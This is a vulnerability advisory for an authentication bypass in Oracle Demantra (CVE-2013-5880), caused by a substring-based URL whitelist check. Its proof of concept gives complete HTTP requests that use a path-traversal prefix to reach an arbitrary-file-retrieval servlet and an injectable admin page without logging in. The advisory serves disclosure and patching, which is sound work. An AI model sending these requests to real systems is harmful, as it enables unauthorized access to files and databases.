Oracle Demantra - Authentication Bypass (CVE-2013-5880)

Oracle Demantra - Authentication Bypass (CVE-2013-5880)

Vulnerable Systems:

Description:

The application's authentication filter is broken by design.

Details:

Demantra uses an Authorization Filter that analyses each request made to the web application. The authorization filter is based on one main file located in the security folder in the root directory. This file is called “authorizationUnsecureURLs.txt”.
There is a vulnerability relating to the way the authorization filter handles input that allows a malicious attacker to bypass authentication.
The authorizedUnsecureURLs contains a list of all pages that can be accessed without a proper authenticated session. When opened the file looks like this:

#This file contains a list of all demantra URLs considered safe for an unauthenticated user.
#This means that anyone can access these pages, and no security checks whatsoever are done on requests
#for these pages.
#WARNING!!! CHANGING ANYTHING IN THIS FILE CAN SERIOUSLY AFFECT PROGRAM USABILITY AND/OR COMPROMISE SECURITY!!!!
#After altering page, for changes to take effect server must be restarted.
#Login
/portal/loginpage.jsp
/common/loginCheck.jsp
/portal/partnerLogin.jsp
/workflow/login.jsp
/LoginServlet
/portal/DOLLogin.jsp
/portal/remoteloginpage.jsp
/admin/adminManagement.jsp
/portal/userManagement.jsp
/portal/adminLogin.jsp
/portal/anywhereLogin.jsp
/portal/launchDPWeb.jsp
/common/changePassword.jsp
#Error Pages
/common/ForbiddenErrorPage.jsp
/portal/notAuthorizedAdmin.jsp
/workflow/notLoggedIn.jsp
/portal/notLoggedIn.jsp
/portal/generalErrorPage.jsp
/portal/notFoundErrorPage.jsp
#Engine
/BatchForecastServlet
/SimulationServlet
#BM
/ServerDetailsServlet
#DB
/NotificationServlet
#Integration
/common/prelogin.jsp
/WorkflowServer
#Other
/ConnectionServlet
/portal/checkSessionExpiration.jsp
The main class is located at :
  • WEB-INF/classes/com/demantra/security/server/authorization/AuthorizationFilter.class
The AuthorizationFilter class loads all the pages in a list and intercepts any request made to the application. The requested URL is then checked through the isSecureURL function which is defined in:
  • WEB-INF/classes/com/demantra/security/server/SessionAuthenticationFilter.class
The function looks like this:
protected boolean isSecureURL(String url) {
    boolean isSecure = true;
    List safeUrls = getSafeUrls();
 
    if(safeUrls != null) {
        Iterator i$ = safeUrls.iterator();
        do {
            if(!i$.hasNext()) break;
            String safeUrl = (String)i$.next();
            if(url.indexOf(safeUrl) != -1) isSecure = false;
        } while(true);
 
    }
    return isSecure;
}
Each request is matched against the URL list defined in the authorizationUnsecureURLs.txt file. However, the code has a design flaw that can be exploited.

Let’s assume we have a URL like this:
  • demantra/common/loginCheck.jsp
This will then be compared with the following code:
url.indexOf(safeURL)
safeURL() contains the allowed URL list, which contains
  • /common/loginCheck.jsp
which will allow any user to view that page.
A malicious attacker can abuse this check due to the insecure usage of indexOf(). Let’s see what the definition of indexOf() says:
int indexOf(String str)
This returns the index within this string of the first occurrence of the specified substring. If it does not occur as a substring, -1 is returned.
As we can see it only check if there is an occurrence of the string, it does not actually check the full URL, which allows an attacker to do things that shouldn’t be possible to do.

Let’s assume an attacker wants to access:
  • /demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications&tkn=-308184887676887
This request would fail as the user would need to be authenticated to access the above URL.
However, if the URL is constructed like:
  • /demantra/common/loginCheck.jsp/../../portal/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications&tkn=-308184887676887
This would be a valid request as the isSecureURL() would return true due to the fact that /common/loginCheck.jsp exists and is a valid URL to be accessed unauthenticated.

POC:

For example the page:
  • /demantra/common/loginCheck.jsp
Is accessible by an unauthenticated user and is therefore listed in the whitelisted URLs list. It is now possible to use this whitelisted URL to access restricted URLs.
As an example the also reported Arbitrary File retrieval vulnerability can be exploited unauthenticated by changing the POST request from:
  • /demantra/GraphServlet
to:
  • /demantra/common/loginCheck.jsp/../../GraphServlet
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
This attack works with other vulnerabilities reported like the SQL injection for example by using the following request:
POST /demantra/common/loginCheck.jsp/../../portal/editExecDefinition.jsp HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.14.171:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 388

done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=

Impact:

A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract data from the database or retrieve files from the system.
This could also lead to arbitrary code execution.

Recommendation:

Please see the according Oracle CPU under:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.